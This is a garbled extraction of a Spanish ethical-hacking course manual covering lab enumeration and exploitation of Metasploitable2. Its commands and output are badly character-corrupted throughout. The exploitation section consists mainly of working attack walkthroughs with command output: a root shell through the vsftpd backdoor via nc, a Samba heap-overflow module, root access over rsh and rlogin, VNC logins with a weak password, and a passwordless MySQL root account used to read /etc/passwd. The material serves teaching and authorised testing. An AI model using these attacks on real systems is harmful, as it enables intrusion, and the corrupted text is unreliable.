Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en N:L. In#"racin "btenida del escane" de $ersi"nes c"n na0.
ama(
-tt0IAA....t-c."r?At-c:aa0A
# amap -h
# amap -&= )*irecci,n#I-+ !-!
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en N:M. (<ecucin de aa0 c"ntra el 0uert" 2M
La enueracin GN% es el 0r"cediient" de l"cali+ar t"d"s l"s ser$id"res GN% & entradas GN% de
una "r?ani+acin "b<eti$"/ 0ara ca0turar in#"racin crJtica c"" n"bres de usuari"s/ n"bres de
c"0utad"ras/ direcci"nes I9/ & de=s.
La enueracin %N;9 0erite reali+ar este 0r"cediient" 0er" utili+ad" el 0r"t"c"l" %N;9/ l" cual
0uede 0eritir "btener in#"racin c"" s"#t.are instalad"/ usuari"s/ tie0" de #unci"naient" del
sistea/ n"bre del sistea/ unidades de alacenaient"/ 0r"ces"s en e<ecucin & uc-a =s
in#"racin.
9ara utili+ar las d"s -erraientas si?uientes es necesari" "di#icar una lJnea en el arc-i$"
AetcAsn0Asn0d.c"n# en ;etas0l"itable2.
agent7ddress "dp:)*ireccion I-+:!/!
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
G"nde UGirecci"n I9W c"rres0"nde a la direccin I9 de ;etas0l"itable2.
Lue?" Kue se -an reali+ad" l"s cabi"s se debe 0r"ceder a iniciar el ser$ici" sn0d/ c"n el si?uiente
c"and"I
$ sudo /etc/init.d/snmp start
snm(6alk
-tt0IAAlinu5.die.netAanA1Asn0.al!
# snmpwal$ -h
# snmpwal$ -c p"&lic )*irecci,n# I-+ -% 2c
Ia?en N:N. In#"racin "btenida 0"r sn0.al!
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
snm(c>eck
-tt0IAA....n"t-in!."r?Ac"desAsn0c-ec!Ainde5.0-0
# snmpchec$ -h
# snmpchec$ -t )*irecci,n#I-+
Ia?en N:O. Iniciand" la e<ecucin de sn0c-ec! c"ntra ;etas0l"itable2
SMT0 user enum
-tt0IAA0entest"n!e&.netAt""lsAst0:user:enu
# smtp-"ser-en"m -h
# smtp-"ser-en"m -> <R?@ -U /"sr/share/metasploit-
framewor$/data/wordlists/"ni'#"sers.t't -t )*irecci,n#I-+
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
(l arc-i$" uni5Zusers.t5t' es un listad" de l"s n"bres de usuari"s Kue se encuentran en un sistea
ti0" Uni5. (n el direct"ri" AusrAs-areAetas0l"it:#rae."r!AdataA."rdlistsA se 0ueden enc"ntrar =s
listas de 0alabras de $ali"sa utilidad 0ara di$ers"s ti0"s de 0ruebas.
Ia?en N:P. st0:user:enu "bteniend" usuari"s de ;etas0l"itable2
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
?% Ma(ear 2ulnerabilidades
La tarea de a0ear $ulnerabilidades c"nsiste en identi#icar & anali+ar las $ulnerabilidades en la red
"b<eti$". )uand" se -an c"0letad" l"s 0r"cediient"s de ca0tura/ descubriient"/ & enueracin
de in#"racin/ es "ent" de identi#icar las $ulnerabilidades. La identi#icacin de $ulnerabilidades
0erite a0render cuales s"n las $ulnerabilidades 0ara las cuales el "b<eti$" es susce0tible/ & 0erite
reali+ar un c"n<unt" de ataKues =s 0ulid".
?%$ 2ulnerabilidad Local
Una $ulnerabilidad l"cal se c"n"ce c"" aKuella d"nde un atacante reKuiere acces" l"cal 0ara
e50l"tar una $ulnerabilidad/ e<ecutand" una 0ie+a de cdi?". Al a0r"$ec-arse de este ti0" de
$ulnerabilidad un atacante 0uede ele$ar sus 0ri$ile?i"s & "btener acces"s sin restriccin en el sistea
"b<eti$".
?%$ 2ulnerabilidad /emota
Una Vulnerabilidad Be"ta es aKuella en el cual el atacante n" tiene acces" 0re$i"/ 0er" la
$ulnerabilidad 0uede ser e50l"tada ediante la red. (ste ti0" de $ulnerabilidad 0erite al atacante
"btener acces" a un sistea "b<eti$" sin en#rentar nin?Dn ti0" de barrera #Jsica " l"cal.
essus 2ulnerabilit3 Scanner
-tt0IAA....tenable.c"A0r"ductsAnessus
Gescar?ar Nessus desde la si?uiente 0=?inaI
-tt0IAA....tenable.c"A0r"ductsAnessusAnessus:d".nl"ad:a?reeent
%elecci"nar el 0aKuete adecuad"/ &a sea Gebian N.0 232 bits3 " Gebian N.0 2NL bits3. F lue?" 0r"ceder
a instalarl" de la si?uiente aneraI
# dp$g -i Ness"s-;..4-de&ian/#i40/.de&
9ara iniciar el de"ni" de Nessus se debe e<ecutar el si?uiente c"and"I
# /opt/ness"s/s&in/ness"s-ser%ice -= -*
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
RabiEn se 0uede utili+ar el si?uiente c"and"/ 0ara iniciar NessusI
# /etc/init.d/ness"sd start
Una $e+ Kue se -a instalad" Nessus/ abrir la si?uiente 0=?ina desde el na$e?ad"r.
https://!2A...!:0041
9ara actuali+ar l"s 0lu?ins de nessus se debe utili+ar l"s si?uientes c"and"s.
# cd /opt/ness"s/s&in
# ./ness"s-"pdate-pl"gins
Ia?en O:1. 1"rulari" de Autenticacin 0ara Nessus
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Lue?" de In?resar el n"bre de usuari" & c"ntrase>a/ cread"s durante el 0r"ces" de c"n#i?uracin/
se 0resentar= la inter#a+ ?r=#ica 0ara utili+ar el escaner de $ulnerabilidades.
Ia?en O:3. Besultad"s del (scane" Be"t" de Vulnerabilidades c"ntra ;etas0l"itable2.
Un d"cuent" c"n la ?uJa de instalacin & c"n#i?uracin de Nessus en idi"a es0a>"l/ 0uede ser
ubicad" enI
-tt0IAAstatic.tenable.c"Ad"cuentati"nAnessusZM.0Zinstallati"nZ?uideZ(%N.0d#
Otr" d"cuent" i0"rtante es la ?uJa del usuari" de Nessus/ la cual 0uede ser ubicad" enI
-tt0IAAstatic.tenable.c"Ad"cuentati"nAnessusZM.0Z7R;LMZuserZ?uideZ(%N.0d#
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
@% Ex(lotar el Ob<eti#o
Lue?" de -aber descubiert" las $ulnerabilidades en el -"st " red "b<eti$"/ es "ent" de intentar
e50l"tarlas. La #ase de e50l"tacin al?unas $eces #inali+a el 0r"ces" de la 9rueba de 9enetracin/
0er" est" de0ende del c"ntrat"/ 0ues e5isten situaci"nes d"nde se debe in?resar de anera =s
0r"#unda en la red "b<eti$" 0ara e50andir el ataKue 0"r t"da la red & ?anar l"s t"d"s l"s 0ri$ile?i"s
0"sibles.
@%$ /e(ositorios con Ex(loits
R"d"s l"s dJas se re0"rtan $ulnerabilidades/ 0er" en la actualidad s"l" una 0eKue>a 0arte de ellas
s"n e50uestas al 0Dblic". Al?un"s de est"s e50l"its'/ 0uede ser descar?ad"s desde siti"s .ebs
d"nde se antienen re0"sit"ri"s de ell"s. Al?un"s de estas 0=?inas se detallan a c"ntinuacin.
(50l"it Gata,aseI -tt0IAA....e50l"it:db.c"A
In<3ct0rI -tt0IAA133Oda&.c"A
)"de (50l"its )"llecti"nI -tt0IAAe50l"itsd".nl"ad.c"
9ac!et %t"rI -tt0IAA0ac!etst"rsecurit&.c"A#ilesAta?sAe50l"itA
;etas0l"it Au5iliar& ;"dule 4 (50l"it GatabaseI -tt0IAA....etas0l"it.c"A"dulesA
Kali Linu5 antiene un re0"sit"ri" l"cal de e50l"its de (50l"it:G,'. (sta base de dat"s l"cal cuenta
c"n un scri0t de n"bre searc-s0l"it'/ el cual 0erite reali+ar bDsKuedas dentr" de esta base de
dat"s l"cal.
R"d"s l"s e50l"its c"ntenid"s en este re0"sit"ri" l"cal est= adecuadaente "rdenad"s e
identi#icad"s. 9"r e<e0l"/ 0ara leer " $isuali+ar el arc-i$" Auni5Are"teA1OLQ1.rb/ se 0ueden utili+ar
l"s si?uientes c"and".
# cd /"sr/share/e'ploitd&/
# ls
# cd platforms/"ni'/remote
# less !A1.!.r&
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en P:1. Besultad"s "btenid"s al reali+ar una bDsKueda c"n el scri0t searc-s0l"it'
@%) La Consola de Metas(loit 8rame6ork
-tt0IAA....etas0l"it.c"A
La )"ns"la de ;etas0l"it 2s#c"ns"le3 es 0rinci0alente utili+ad" 0ara ane<ar la base de dat"s de
;etas0l"it/ ane<ar las sesi"nes/ ade=s de c"n#i?urar & e<ecutar l"s dul"s de ;etas0l"it. %u
0r"0sit" esencial es la e50l"tacin. (sta 0erite c"nectarse al "b<eti$" de tal anera Kue se
0uedann e<ecutar l"s e50l"its c"ntra este.
Gad" Kue ;etas0l"it 1rae."r! utili+a 9"st?re%*L c"" su ,ase de Gat"s/ esta debe ser iniciada
en 0riera instancia. Lue?" se 0"dr= iniciar la c"ns"la de ;etas0l"it 1rae."r!.
# ser%ice postgres=l start
9ara $eri#icar Kue el ser$ici" se -a iniciad" c"rrectaente se debe e<ecutar el si?uiente c"and".
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
# netstat -tna : grep ;142
9ara "strar la a&uda ;etas0l"it 1rae."r!.
# msfconsole -h
# msfconsole
Al?un"s de l"s c"and"s Dtiles 0ara interactuar c"n la c"ns"la s"nI
a $eri#icar Kue el ser$ici" se -a iniciad" c"rrectaente se debe e<ecutar el si?uiente c"and".
msf B help
msf B "se )Nom&re >,d"lo+
msf B set )Nom&re 2pci,n+ )Nom&re >,d"lo+
msf B e'ploit
msf B r"n
msf Bsearch )Nom&re >,d"lo+
msf B e'it
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en P:2. )"ns"la de ;etas0l"it 1rae."r!
(n el si?uiente e<ercici" se detalla el us" del dul" au5iliar %;, User (nuerati"n 2%A;
(nuUsers3'.
msf B search sm&
msf B "se a"'iliary/scanner/sm&/sm&#en"m"sers
msf a"'iliaryCsm&#en"m"sersD B info
msf a"'iliaryCsm&#en"m"sersD B show options
msf a"'iliaryCsm&#en"m"sersD B set R62E8E !.2.!/0.!.41
msf a"'iliaryCsm&#en"m"sersD B e'ploit
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en P:3. Lista de usuari"s "btenid"s c"n el dul" au5iliar sbZenuusers
@%, CLI de Metas(loit 8rame6ork
;etas0l"it )LI 2s#cli3 es una de las inter#aces Kue 0erite a ;etas0l"it 1rae."r! reali+ar sus
tareas. (sta es una buena inter#a+ 0ara a0render a ane<ar ;etas0l"it 1rae."r! " 0ara e$aluar A
escribir un nue$" e50l"it. RabiEn es Dtil en cas" se reKuiera utili+arl" en scri0ts & a0licar
aut"ati+acin 0ara tareas.
# msfcli -h
# msfcli
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en P:L. Inter#a+ en LJnea de )"and" 2)LI3 de ;etas0l"it 1rae."r!
# msfcli )R"ta E'ploit+ )2pci,n F <alor+
;uestra las "0ci"nes a$an+adas del dul"
# msfcli a"'iliary/scanner/mys=l/mys=l#%ersion 7
;uestra un resuen del dul"
# msfcli a"'iliary/scanner/mys=l/mys=l#%ersion E
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Lista las "0ci"nes dis0"nibles del dul"
# msfcli a"'iliary/scanner/mys=l/mys=l#%ersion 2
9ara e<ecutar el dul" au5iliar c"ntra ;etas0l"itable2
# msfcli a"'iliary/scanner/mys=l/mys=l#%ersion R62E8EF!.2.!/0.!.41 E
Ia?en P:M. Besultad" "btenid" c"n el dul" au5iliar &sKlZ$ersi"n
@%' Interacci*n con Meter(reter
Una $e+ Kue se -a "btenid" acces" al "b<eti$" utili+and"/ se 0uede utili+ar ;eter0reter 0ara entre?ar
9a&l"ads 2)ar?as3. %e utili+a ;%1)ON%OL( 0ara ane<ar las sesi"nes/ ientras Kue ;eter0reter es
)ar?a actual & tiene el c"0r"is" de la e50l"tacin.
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Al?un"s de l"s c"and" c"Dnente utili+ad"s c"n ;eter0reter s"nI
meterpreter B help
meterpreter B &ac$gro"nd
meterpreter B download
meterpreter B "pload
meterpreter B e'ec"te
meterpreter B shell
meterpreter B session
@%' Ex(lotar 2ulnerabilidades de Metas(loitable)
2ulnerabilidad
$s#t0d %ile& 1ace ,ac!d""r
-tt0IAA...."s$db."r?As-".A"s$dbAO3MO3
An!lisis
La $ersin de $s#t0d en #unci"naient" en el sistea re"t" -a sid" c"0ilad" c"n una 0uert"
trasera. Al intentar autenticarse c"n un n"bre de usuari" c"nteniend" un I3 2)arita s"nriente3 e<ecuta
una 0uerta trasera/ el cual ?enera una s-ell atendiend" en el 0uert" R)9 N200. (l s-ell detiene su
atencin des0uEs de Kue el cliente se c"necta & desc"necta.
Un atacante re"t" sin autenticacin 0uede e50l"tar esta $ulnerabilidad 0ara e<ecutar cdi?"
arbitrari" c"" r""t.
rootG$ali:H# ftp !.2.!/0.!.41
Ionnected to !.2.!/0.!.41.
22 C%s?8-d 2.4.1D
Name C!.2.!/0.!.41:rootD: "s"ario:D
44! -lease specify the password.
-assword:
JK
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
)4+L Etopped ftp !.2.!/0.!.41
rootG$ali:H# &g 4
)4+L ftp !.2.!/0.!.41 M
rootG$ali:H# nc -n%% !.2.!/0.!.41 /2
CUNNN2OND )!.2.!/0.!.41+ /2 CPD open
id
"idFCrootD gidFCrootD
2ulnerabilidad
%aba NGB ;%:B9) BeKuest 7ea0:,ased Be"te ,u##er O$er#l".
-tt0IAA....c$edetails.c"Ac$e:details.0-0[t\14c$eZid\)V(:200O:2LLN
An!lisis
(sta $ersin del ser$id"r %aba instalad" en el -"st re"t" est= a#ectad" 0"r $arias $ulnerabilidades
de desb"rdaient" de 0ila/ el cual 0uede ser e50l"tad" re"taente 0ara e<ecutar cdi?" c"n l"s
0ri$ile?i"s del de"ni" %aba.
rootG$ali:H# /etc/init.d/postgres=l start
) o$ + Etarting -ostgreEQR ..! data&ase ser%er: main.
rootG$ali:H# msfconsole
msf B search lsa#io#pri%ilege#set 6eap
>atching >od"les
FFFFFFFFFFFFFFFF
Name *isclos"re *ate Ran$ *escription
---- --------------- ---- -----------
a"'iliary/dos/sam&a/lsa#addpri%s#heap normal Eam&a
lsa#io#pri%ilege#set 6eap 2%erflow
msf B "se a"'iliary/dos/sam&a/lsa#addpri%s#heap
msf a"'iliaryClsa#addpri%s#heapD B show options
>od"le options Ca"'iliary/dos/sam&a/lsa#addpri%s#heapD:
Name I"rrent Eetting Re="ired *escription
---- --------------- -------- -----------
R62E8 yes 8he target address
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
R-2R8 11; yes Eet the E>S ser%ice port
E>S-I-E RE7R-I yes 8he pipe name to "se
msf a"'iliaryClsa#addpri%s#heapD B set R62E8 !.2.!/0.!.41
R62E8 FB !.2.!/0.!.41
msf a"'iliaryClsa#addpri%s#heapD B e'ploit
)T+ Ionnecting to the E>S ser%ice...
)T+ Sinding to !241;AA0-!241-a&cd-ef-
!241;/A0.a&:.Gncacn#np:!.2.!/0.!.41)9lsarpc+ ...
)T+ So"nd to !241;AA0-!241-a&cd-ef-
!241;/A0.a&:.Gncacn#np:!.2.!/0.!.41)9lsarpc+ ...
)T+ Ialling the %"lnera&le f"nction...
)-+ 7"'iliary triggered a timeo"t e'ception
)T+ 7"'iliary mod"le e'ec"tion completed
msf a"'iliaryClsa#addpri%s#heapD B e'ploit
2ulnerabilidad
rs- Unaut-enticated Acces 2$ia #in?er in#"rati"n3
-tt0IAA....c$edetails.c"Ac$e:details.0-0[t\14c$eZid\)V(:2012:N3Q2
An!lisis
Utili+and" n"bres de usuari" c"unes c"" tabiEn n"bres de usuari"s re0"rtad"s 0"r #in?er'.
(s 0"sible autenticarse ediante rs-. Fa sea las cuentas n" est=n 0r"te?idas c"n c"ntrase>as " l"s
arc-i$"s ]A.r-"sts " est=n c"n#i?uradas adecuadaente.
(sta $ulnerabilidad est= c"n#irada de e5istir 0ara )isc" 9rie LAN ;ana?eent %"luti"n/ 0er"
0uede estar 0resente en cualKuier -"st Kue n" este c"n#i?urad" de anera se?ura.
rootG$ali:H# rsh -l root !.2.!/0.!.41 /&in/&ash
w
22:12: "p !:4U 2 "sersU load a%erage: .1U .2U .
UEER 88@ ?R2> R2VING I*RE WI-U -I-U O678
msfadmin tty! - 2!:!4 !:!. A.!s .2s /&in/login --
root pts/ :. 2!:!! !:4 .s .s -&ash
id
"idFCrootD gidFCrootD gro"psFCrootD
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
2ulnerabilidad
VN) %er$er ^0ass."rd^ 9ass."rd
An!lisis
(l ser$id"r VN) #unci"nand" en el -"st re"t" est= ase?urad" c"n una c"ntrase>a u& dEbil. (s
0"sible autenticarse utili+and" la c"ntrase>a ^0ass."rd^. Un atacante re"t" sin autenticar 0uede
e50l"tar est" 0ara t"ar c"ntr"l del sistea.
Ia?en P:N. )"ne5in ediante VN) a ;etas0l"itable2/ utili+and" una c"ntrase>a dEbil
rootG$ali:H# %nc%iewer !.2.!/0.!.41
Ionnected to R?S ser%erU "sing protocol %ersion 4.4
-erforming standard <NI a"thentication
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
-assword:
7"thentication s"ccessf"l
*es$top name 5rootXs X des$top Cmetasploita&le:D5
<NI ser%er defa"lt format:
42 &its per pi'el.
Reast significant &yte first in each pi'el.
8r"e colo"r: ma' red 2;; green 2;; &l"e 2;;U shift red !/ green 0 &l"e
Using defa"lt colormap which is 8r"eIolor. -i'el format:
42 &its per pi'el.
Reast significant &yte first in each pi'el.
8r"e colo"r: ma' red 2;; green 2;; &l"e 2;;U shift red !/ green 0 &l"e
Using shared memory -"tImage
2ulnerabilidad
;&%*L Un0ass."rded Acc"unt )-ec!
An!lisis
(s 0"sible c"nectarse a la base de dat"s ;&%*L re"ta utili+and" una cuenta sin c"ntrase>a. (st"
0uede 0eritir a un atacante a lan+ar ataKues c"ntra la base de dat"s.
)"n ;etas0l"it 1rae."r!I
msf B search mys=l#s=l
>atching >od"les
FFFFFFFFFFFFFFFF

Name *isclos"re *ate Ran$ *escription
---- --------------- ---- -----------
a"'iliary/admin/mys=l/mys=l#s=l normal >yEQR EQR Veneric
Q"ery
msf B "se a"'iliary/admin/mys=l/mys=l#s=l
msf a"'iliaryCmys=l#s=lD B show options
>od"le options Ca"'iliary/admin/mys=l/mys=l#s=lD:
Name I"rrent Eetting Re="ired *escription
---- --------------- -------- -----------
-7EEO2R* no 8he password for the specified
"sername
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
R62E8 yes 8he target address
R-2R8 44/ yes 8he target port
EQR select %ersionCD yes 8he EQR to e'ec"te.
UEERN7>E no 8he "sername to a"thenticate as
msf a"'iliaryCmys=l#s=lD B set UEERN7>E root
UEERN7>E FB root
msf a"'iliaryCmys=l#s=lD B set R62E8 !.2.!/0.!.41
R62E8 FB !.2.!/0.!.41
msf a"'iliaryCmys=l#s=lD B set EQR select load#fileC9X/etc/passwd9XD
EQR FB select load#fileCX/etc/passwdXD
msf a"'iliaryCmys=l#s=lD B r"n
)T+ Eending statement: Xselect load#fileCX/etc/passwdXDX...
)T+ : root:':::root:/root:/&in/&ash
daemon:':!:!:daemon:/"sr/s&in:/&in/sh
&in:':2:2:&in:/&in:/&in/sh
sys:':4:4:sys:/de%:/&in/sh
sync:':1:/;;41:sync:/&in:/&in/sync
games:':;:/:games:/"sr/games:/&in/sh
man:':/:!2:man:/%ar/cache/man:/&in/sh
lp:':A:A:lp:/%ar/spool/lpd:/&in/sh
mail:':0:0:mail:/%ar/mail:/&in/sh
news:':.:.:news:/%ar/spool/news:/&in/sh
""cp:':!:!:""cp:/%ar/spool/""cp:/&in/sh
pro'y:':!4:!4:pro'y:/&in:/&in/sh
www-data:':44:44:www-data:/%ar/www:/&in/sh
&ac$"p:':41:41:&ac$"p:/%ar/&ac$"ps:/&in/sh
list:':40:40:>ailing Rist >anager:/%ar/list:/&in/sh
irc:':4.:4.:ircd:/%ar/r"n/ircd:/&in/sh
gnats:':1!:1!:Vnats S"g-Reporting Eystem CadminD:/%ar/li&/gnats:/&in/sh
no&ody:':/;;41:/;;41:no&ody:/none'istent:/&in/sh
li&""id:':!:!!::/%ar/li&/li&""id:/&in/sh
dhcp:':!!:!2::/none'istent:/&in/false
syslog:':!2:!4::/home/syslog:/&in/false
$log:':!4:!1::/home/$log:/&in/false
sshd:':!1:/;;41::/%ar/r"n/sshd:/"sr/s&in/nologin
msfadmin:':!:!:msfadminUUU:/home/msfadmin:/&in/&ash
&ind:':!;:!!4::/%ar/cache/&ind:/&in/false
postfi':':!/:!!;::/%ar/spool/postfi':/&in/false
ftp:':!A:/;;41::/home/ftp:/&in/false
postgres:':!0:!!A:-ostgreEQR administratorUUU:/%ar/li&/postgres=l:/&in/&ash
mys=l:':!.:!!0:>yEQR Eer%erUUU:/%ar/li&/mys=l:/&in/false
tomcat;;:':!!:/;;41::/"sr/share/tomcat;.;:/&in/false
distccd:':!!!:/;;41::/:/&in/false
"ser:':!!:!!:Y"st a "serU!!!UU:/home/"ser:/&in/&ash
ser%ice:':!2:!2:UUU:/home/ser%ice:/&in/&ash
telnetd:':!!2:!2::/none'istent:/&in/false
proftpd:':!!4:/;;41::/%ar/r"n/proftpd:/&in/false
statd:':!!1:/;;41::/%ar/li&/nfs:/&in/false
snmp:':!!;:/;;41::/%ar/li&/snmp:/&in/false
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
:
)T+ 7"'iliary mod"le e'ec"tion completed
msf a"'iliaryCmys=l#s=lD B
;anualenteI
rootG$ali:H# mys=l -h !.2.!/0.!.41 -" root -p
Enter password:
Oelcome to the >yEQR monitor. Iommands end with Z or 9g.
@o"r >yEQR connection id is A
Eer%er %ersion: ;..;!a-4"&"nt"; CU&"nt"D
Iopyright CcD 2U 2!4U 2racle and/or its affiliates. 7ll rights reser%ed.
2racle is a registered trademar$ of 2racle Iorporation and/or its
affiliates. 2ther names may &e trademar$s of their respecti%e
owners.
8ype XhelpZX or X9hX for help. 8ype X9cX to clear the c"rrent inp"t statement.
mys=lB show data&asesZ
L--------------------L
: *ata&ase :
L--------------------L
: information#schema :
: d%wa :
: metasploit :
: mys=l :
: owasp! :
: ti$iwi$i :
: ti$iwi$i!.; :
L--------------------L
A rows in set C. secD
mys=lB "se information#schema
Reading ta&le information for completion of ta&le and col"mn names
@o" can t"rn off this feat"re to get a ="ic$er start"p with -7
*ata&ase changed
mys=lB show ta&lesZ
L---------------------------------------L
: 8a&les#in#information#schema :
L---------------------------------------L
: I67R7I8ER#EE8E :
: I2RR78I2NE :
: I2RR78I2N#I67R7I8ER#EE8#7--RII7SIRI8@ :
: I2RU>NE :
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
: I2RU>N#-RI<IREVEE :
: NE@#I2RU>N#UE7VE :
: -R2?IRINV :
: R2U8INEE :
: EI6E>787 :
: EI6E>7#-RI<IREVEE :
: E878IE8IIE :
: 87SREE :
: 87SRE#I2NE8R7IN8E :
: 87SRE#-RI<IREVEE :
: 8RIVVERE :
: UEER#-RI<IREVEE :
: <IEOE :
L---------------------------------------L
!A rows in set C. secD
2ulnerabilidad
rl"?in %er$ice Getecti"n
-tt0IAAc$edetails.c"Ac$e:details.0-0[t\14c$eZid\)V(:1QQQ:0NM1
An!lisis
(l -"st re"t" est= e<ecutand" el ser$ici" ^rl"?in^. (ste ser$ici" es 0eli?r"s" en el sentid" Kue n" es
ci#rad": es decir/ cualKuiera 0uede interce0tar l"s dat"s Kue 0asen a tra$Es del cliente rl"?in & el
ser$id"r rl"?in. (st" inclu&e l"?ins & c"ntrase>as.
RabiEn/ est" 0uede 0eritir una autenticacin 0"brle sin c"ntrase>as. %i el -"st es $ulnerable a la
0"sibilidad de adi$inar el nDer" de secuencia R)9 2Gesde cualKuier Bed3 " I9 %0""#in? 2Inclu&end"
secuestr" AB9 s"bre la red l"cal3 ent"nces 0uede ser 0"sible e$adir la autenticacin.
1inalente/ rl"?in es una anera sencilla de acti$ar el acces" de escritura un arc-i$" dentr" de
autenticaci"nes c"0letas ediante l"s arc-i$"s .r-"sts " r-"sts.eKui$.
rootG$ali:H# rlogin -l root !.2.!/0.!.41
Rast login: 8h" W"l !! 2!:!!:1 E*8 2!4 from :. on pts/
Rin"' metasploita&le 2./.21-!/-ser%er #! E>- 8h" 7pr ! !4:;0: U8I 20 i/0/
8he programs incl"ded with the U&"nt" system are free softwareZ
the e'act distri&"tion terms for each program are descri&ed in the
indi%id"al files in /"sr/share/doc/T/copyright.
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
U&"nt" comes with 7SE2RU8ER@ N2 O7RR7N8@U to the e'tent permitted &y
applica&le law.
8o access official U&"nt" doc"mentationU please %isit:
http://help."&"nt".com/
@o" ha%e new mail.
rootGmetasploita&le:H#
2ulnerabilidad
rs- %er$ice Getecti"n
-tt0IAAc$edetails.c"Ac$e:details.0-0[t\14c$eZid\)V(:1QQQ:0NM1
An!lisis
(l -"st re"t" est= e<ecutand" el ser$ici" ^rs-^. (ste ser$ici" es 0eli?r"s" en el sentid" Kue n" es
ci#rad": es decir/ cualKuiera 0uede interce0tar l"s dat"s Kue 0asen a tra$Es del cliente rl"?in & el
ser$id"r rl"?in. (st" inclu&e l"?ins & c"ntrase>as.
RabiEn/ est" 0uede 0eritir una autenticacin 0"brle sin c"ntrase>as. %i el -"st es $ulnerable a la
